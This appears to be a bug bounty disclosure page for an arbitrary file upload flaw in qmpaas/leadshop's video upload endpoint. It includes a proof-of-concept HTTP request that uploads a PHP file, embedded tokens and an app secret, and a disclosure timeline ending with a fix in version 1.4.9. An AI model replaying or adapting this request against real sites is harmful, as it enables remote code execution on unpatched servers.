Unrestricted Upload of File with Dangerous Type in qmpaas/leadshop


Reported on

Dec 2nd 2021


The vulnerability is in the api/ImageController.php file. image-20211202133840294

When $type is 2, it will enter the logic for uploading video files. However, the function $upload->video that handles video uploads does not detect the file suffix name. This results in arbitrary file uploads. image-20211202133922904

Proof of Concept

POST /index.php?q=/api/leadmall/image HTTP/1.1
Host: ???
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary="boundary"
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImp0aSI6Ijk4YzA4YzI1ZjgxMzZkNTkwYyJ9.eyJpc3MiOiJodHRwOlwvXC9kZW1vLmxlYWRzaG9wLnZpcCIsImF1ZCI6Imh0dHBzOlwvXC9kZW1vLmxlYWRzaG9wLnZpcCIsImp0aSI6Ijk4YzA4YzI1ZjgxMzZkNTkwYyIsImlhdCI6MTYzMTYwOTMxOSwiZXhwIjoxNjMxNjk1NzE5LCJpZCI6MX0.PdqX6vNh2LZ607lnd0J6JiU_Wf_SnPu3bbXVz4gfXEk
QM-APP-TYPE: undefined
QM-APP-ID: 98c08c25f8136d590c
QM-APP-SECRET: 3AYpU16dZ1CY7ejqvrE39B351vanLJVD
Content-Length: 1127
Connection: close
Cookie: _csrf=d31c94bc1ac116b99cf287a046dc1642965fba6d4232d378c5719685445276fba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22lrOxUbG2yPlq8P0DwPnuvxdNBXzu4wIh%22%3B%7D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Content-Disposition: form-data; name="type"

Content-Disposition: form-data; name="content"; filename="test.php"

<?php phpinfo();



This vulnerability can lead to users being able to upload arbitrary php files, which in turn can lead to RCE.

We are processing your report and will contact the qmpaas/leadshop team within 24 hours. 2 years ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 years ago
AFKL submitted a
2 years ago
leadshop开源商城 validated this vulnerability 2 years ago
afkl-cuit has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the qmpaas/leadshop team. We will try again in 7 days. 2 years ago
We have sent a second fix follow up to the qmpaas/leadshop team. We will try again in 10 days. 2 years ago
We have sent a third and final fix follow up to the qmpaas/leadshop team. This report is now considered stale. 2 years ago
2 years ago


Hello @admin, I noticed that the qmpaas/leadshop team seems to have fixed this vulnerability in an update two months ago (the update commit is https://github.com/qmpaas/leadshop/commit/b81e65c1d45a4ff418fa11122a4ec4397d9a1425). So what should we do next?🤔

Jamie Slome marked this as fixed in 1.4.9 with commit b81e65 2 years ago
The fix bounty has been dropped
Jamie Slome
2 years ago

Sorted 👍

to join this conversation